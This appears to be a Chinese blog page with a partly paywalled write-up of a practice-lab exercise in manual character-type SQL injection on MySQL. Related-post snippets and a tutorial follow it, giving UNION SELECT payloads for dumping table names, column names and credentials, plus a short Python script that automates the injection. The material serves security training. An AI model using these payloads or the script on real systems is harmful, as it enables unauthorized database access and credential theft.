墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符)

原创 已于 2022-04-21 16:56:31 修改 · 2.9k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全

于 2022-04-21 16:55:34 首次发布
本文通过墨者学院的靶场演示了SQL手工注入的过程,首先尝试在账号密码输入处注入,然后通过修改公告ID发现注入点。通过闭合点判断和order by测试确定字段个数为4。接着使用联合查询揭示页面数据,逐步进行爆库名、表名、列名和字段内容的操作。最终,获取到两个账号的MD5加密密码,并通过解密获得关键信息,成功登录网站获取key。

启动靶场正常访问:

随便输入账号和密码:

并没有发现什么可用的信息

点击查看公告:

可以看到详细的公告哈!我们看看能不能在公告上做文章。

修改公告id后发现没有公告展示了。

 开始尝试从这边注入:

/new_list.php?id=tingjigonggao and 1=1

条件成立也没有数据,我们来判断一下闭合。

/new_list.php?id=tingjigonggao' and '1'='1

最低0.47元/天 解锁文章
SQL手工注入漏洞测试(MySQL数据库)
asd158923328的博客
08-20 1546
靶场地址: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 根据题意 进入页面 找到注入点 and 1=1 页面正常 and 1=2 页面报错 通过SQL语句中order by N 来判断有几个字段,返回内容正常,可以确定至少有1个字段。 通过SQL语句中order by N 来判...
墨者--SQL手工注入漏洞测试(MySQL数据库)
YYYYYcici的博客
05-18 1583
墨者SQL手工注入漏洞测试(MySQL数据库) 解题思路: 判断注入 利用order by 判断字段数量 联合注入 1、判断注入 2、order by判断 3、联合注入 查库名 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=”库名” and 1=2 un...
SQL手工注入漏洞测试(MySQL数据库-字符)
kugaigao_的博客
12-10 496
启动靶场 点击‘关于平台停机维护的通知’ 在id后加’%23 判断是否存在注入点,加’ and 1=1%23,存在注入点。 ’ order by 5%23 ’ order by 4%23,有四个字段。 id=1’ and 1=2 union select 1,2,3,4%23 id=1’ and 1=2 union select 1,database(),version(),4%23 id=1’ ...
SQL手工注入漏洞测试(MySQL数据库-字符)-墨者
weoptions的博客
12-01 2622
———靶场专栏———分享我的解题过程
sql注入(2) 墨者学院SQL手工注入漏洞测试MySQL数据库-字符型)
c10udz的博客
04-12 4918
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。
墨者靶场-SQL手工注入漏洞测试(MySQL数据库)
mylovehx的博客
10-03 886
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符)
weixin_46694260的博客
03-27 4173
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者学院SQL手工注入漏洞测试(MySQL数据库)
muyuchen110的博客
07-22 625
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
m0_73681638的博客
06-16 451
通常 Sql 注入漏洞分为 2 种类型:数字型,字符型。数字型判断:在加载好的Url 地址中输入and 1=1,页面依旧运行正常,继续进行下一步。断网页是否存在sql注入使用单引号判断法:在参数后面加上单引号, 原因为无论字符型还是整型都会 因为单引号个数不匹配而报错。使用火狐插件—hackbar,加载出当前界面的url,使用单引号判断法,页面返回错误,存在 Sql 注 入。
墨者学院SQL手工注入漏洞测试(MySQL数据库-字符)
最新发布
2303_81096390的博客
08-02 706
进入靶场环境,点击登录框下面的那一串流动的字符进入具体的注入点页面查看url,发现有可变的参数?id=,此处为字符注入sql注入分为字符注入和数字型注入,两者有什么区别呢,简单来说就是字符注入需要闭合,而数字型注入不需要闭合具体解释:为什么字符型需要闭合,数字型不需要?
SQL手工注入漏洞测试(MySQL数据库-字符型)
m0_67399862的博客
05-13 356
打开题目后出现改主页,点击下面的通知 看到id名为字符串,需要留意,将id名改为任意字符串报错,说明有注入点 发现直接用order by语句不能进行猜解 尝试使用单引号(‘)闭合前面的单引号,让SQL语句能执行 通过order by语句可猜解出字段数为4 使用union select进行联合查询,发现1,2,3,4没有显示 所以在id前的字符串加上负号 因为只显示出2,3,所以用想查询的信息替换数字2,3 由查询得,数据库名为mozhe_disc...
墨者 - SQL手工注入漏洞测试(MySQL数据库-字符)
吃肉唐僧的博客
07-06 707
字符型,其实与数字型得注入思路没什么区别,只不过需要注意构造单引号和后面加注释就行了 id=tingjigonggao' order by 1-- 测试 字段个数,发现有4个 试过盲猜表,admin,manger,失败 老老实实暴库,先测回显位置 id=tingjigongga' union select '1','2','3','4' -- /new_l...
墨者 - SQL手工注入漏洞测试(MySQL数据库)
吃肉唐僧的博客
07-02 821
/new_list.php?id=1 and 1=1,判断id的类型值是数字类型 /new_list.php?id=1 order by 4,测出数据库有4个字段,第5个不回显 测出页面回显位置 2和3 /new_list.php?id=1 and 1=2 union select 1,2,3,4 爆库 /new_list.php?id=1 and 1=2 uni...
墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型)
Fisher
12-02 820
写在前面: 最近准备从头再来过一遍sql,所以开始刷墨者学院的题目。 这是一道最简单的字符型 联合注入题目 目的:拿到用户与密码 首先寻找注入点,我们发现在维护界面存在id字段可能存在注入。 1.找闭合字符 首先尝试寻找闭合字符,当输入‘时界面加载正确 可能是’,接着测试 and 1=1 界面正确,and1=2 界面错误 没错说明确实闭合字符是单引号。 当然需要–+起到闭合后面闭合字符的作用。 接下来用order by 判断有多少列 order by 1时正确 order by 5 时错误说明共4列
墨者靶场SQL手工注入漏洞测试(MySQL数据库-字符)
zyh1588的博客
11-01 417
小白回顾墨者靶场手工注入
墨者学院SQL手动注入字符型)
wxdby的博客
12-08 437
点开环境后,点击这里: 会出现: 从题目或者从网址看到只是一个字符型的注入。首先,我们要判断是否存在判断点 加 ’ and 1=1%23正常.(%23就相当于#,但用#的话结束不了所以就用%23) 存在注入点,然后判断字段数: 判断字段数。order by 5%23报错 order by 4%23,没事: 输入:id=1’ union select 1,2,3,4%23 输入:union se...
墨者学院SQL字符注入题解
qq_46111881的博客
11-08 299
一、打开原码,发现URL:new_list.php? id=tingjigonggao,尝试着注入。 ​输入new_list.php?id=tingjigonggao’页面报错。加上一个and‘1’=1正确返回。 二、判断字段数 ​order by 1--+ ​order by 2--+ ​order by 3--+ ​order by 4--+ ​order by 5--+报错,说明字段数为4 三、判断显示位 ​union select 1,2,3,4--+。返回2和3,说明可以从2,3进行注
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库字符注入
全村的希望
11-25 1416
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库字符注入
墨者SQL字符注入题解
qq_46111881的博客
11-08 285
一、打开原码,发现URL:new_list.php?id=tingjigonggao,尝试着注入。 ​输入new_list.php?id=tingjigonggao’页面报错。加上一个and‘1’=1正确返回。 二、判断字段数 ​order by 1--+ ​order by 2--+ ​order by 3--+ ​order by 4--+ ​order by 5--+报错,说明字段数为4 三、判断显示位 ​union select 1,2,3,4--+。返回2和3,说明可以从2,3进行注入。 四、
墨者学院——SQL手工注入漏洞测试(MySQL数据库)
07-06
### SQL手工注入漏洞测试方法(MySQL数据库SQL手工注入是一种常见的Web安全测试技术,通过手动构造恶意SQL语句,尝试绕过应用程序的安全机制,从而获取数据库信息或执行任意操作。以下是针对MySQL数据库手工注入常见方法和步骤: #### 1. 判断注入点 首先需要判断目标页面是否存在SQL注入漏洞。可以通过在参数后添加单引号 `'` 或其他特殊字符来触发数据库报错,观察页面是否返回错误信息。例如: ``` http://example.com/page.php?id=1' ``` 如果页面返回类似 `You have an error in your SQL syntax` 的错误,则可能存在SQL注入漏洞。 #### 2. 确定字段数 使用 `ORDER BY` 语句确定查询的字段数量。逐步增加数字,直到页面返回错误为止,即可确定字段数。例如: ``` http://example.com/page.php?id=1 order by 10--+ ``` 若返回错误,则减少数值继续尝试,直到找到正确的字段数。 #### 3. 获取当前数据库信息 通过 `union select` 语句获取当前数据库名、用户等信息。例如: ``` http://example.com/page.php?id=-1 union select 1,database(),user()--+ ``` 此语句将显示当前数据库名称和数据库用户名。 #### 4. 爆破数据库表名 利用 `information_schema.tables` 表获取当前数据库下的所有表名。可以使用 `group_concat` 函数一次性获取多个表名: ``` http://example.com/page.php?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ ``` 该语句将列出当前数据库中的所有表名。 #### 5. 获取列名 通过 `information_schema.columns` 表获取指定表的列名。例如,获取名为 `users` 的表的所有列名: ``` http://example.com/page.php?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()--+ ``` 该语句将显示 `users` 表中所有的列名。 #### 6. 获取敏感数据 在获取到列名后,可以进一步提取敏感数据。例如,从 `users` 表中提取用户名和密码: ``` http://example.com/page.php?id=-1 union select 1,username,password from users--+ ``` 该语句将显示 `users` 表中的用户名和密码字段内容[^4]。 #### 7. 使用注释符绕过过滤 在某些情况下,应用程序可能对输入进行了部分过滤。此时可以使用不同的注释符绕过限制,如 `--+`、`--`、`/* */` 等。例如: ``` http://example.com/page.php?id=1' union select 1,2,3 from users where 1=1/* ``` #### 8. 字符注入 对于字符注入,通常需要闭合原始的字符串引号,并使用注释符忽略后续代码。例如: ``` http://example.com/page.php?id=1' union select 1,table_name,3 from information_schema.tables where table_schema='target_db'--+ ``` #### 示例代码:手工注入流程脚本 以下是一个简单的Python脚本示例,用于自动化检测SQL注入点并获取数据库信息: ```python import requests url = "http://example.com/page.php" params = {"id": "1'"} # 检测注入点 response = requests.get(url, params=params) if "error" in response.text: print("可能存在SQL注入漏洞") # 获取数据库名 payload = {"id": "-1 union select 1,database(),3--+"} response = requests.get(url, params=payload) print("当前数据库名:", response.text) # 获取表名 payload = {"id": "-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+"} response = requests.get(url, params=payload) print("数据库表名:", response.text) ``` #### 注意事项 - **合法性**:进行SQL注入测试前,必须获得目标系统的合法授权,未经授权的渗透测试属于违法行为。 - **防护措施**:建议开发人员使用参数化查询(预编译语句)来防止SQL注入攻击。 - **工具辅助**:虽然手工注入能提高理解能力,但在实际测试中可结合工具如SQLMap提升效率。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值